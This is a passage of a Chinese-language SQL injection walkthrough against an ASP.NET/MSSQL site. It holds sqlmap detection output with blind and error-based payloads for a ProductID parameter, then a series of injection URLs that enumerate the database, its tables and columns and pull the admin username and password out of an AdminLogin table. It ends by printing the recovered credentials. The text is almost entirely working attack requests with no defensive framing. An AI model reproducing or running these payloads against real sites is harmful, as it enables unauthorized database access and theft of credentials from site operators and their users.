--- Parameter: ProductID (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: ProductID=2' AND 1913=1913 AND 'GquC'='GquC Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause(IN) Payload: ProductID=2' AND 1360 IN (SELECT (CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (1360=1360) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(113)+CHAR(98)+CHAR(113))) AND 'JOdp'='JOdp --- web server operating system: Windows 8.1 or 2012 R2 web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5 back-end DBMS: Microsoft SQL Server 2008
1. http://B.com/AutoMain.aspx?ProductID=1' and db_name()>0-- b.com_db
查询当前数据信息:
1 2
1. http://B.com/AutoMain.aspx?ProductID=1' having 1=1-- Product.ProductID
踩坑指南:
子查询不支持返回多条数据,且mssql不像MySQL那样支持limit,下面给出解决办法
获取表名:
1 2 3 4 5 6
1. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 name from sysobjects where xtype='u' and name !='info');-- 2. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 table_name from information_schema.tables);-- 此方法可查询任意用户表: http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 name from (select top 1 id,name from sysobjects where xtype=char(85)) T order by id desc) > 1-- 获取到的用户表: AdminLogin
获取列名:
1 2 3 4 5 6 7 8
1. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 name from syscolumns where id=(select id from sysobjects where name = 'AdminLogin') and name<>'id');-- 2. http://B.com/AutoMain.aspx?ProductID=1' and 1=(select top 1 column_name from information_schema.columns);-- 此方法可查询AdminLogin表的任意列: 3. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 col_name(object_id('AdminLogin'),1) from sysobjects) > 1-- 获取到用户表的列名: AdminID UserName Password
获取数据:
1 2 3 4 5
1. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 UserName from AdminLogin where AdminID=1) > 1-- 2. http://B.com/AutoMain.aspx?ProductID=1' and (select top 1 Password from AdminLogin where AdminID=1) > 1-- 获取到的账号密码: admin islamabad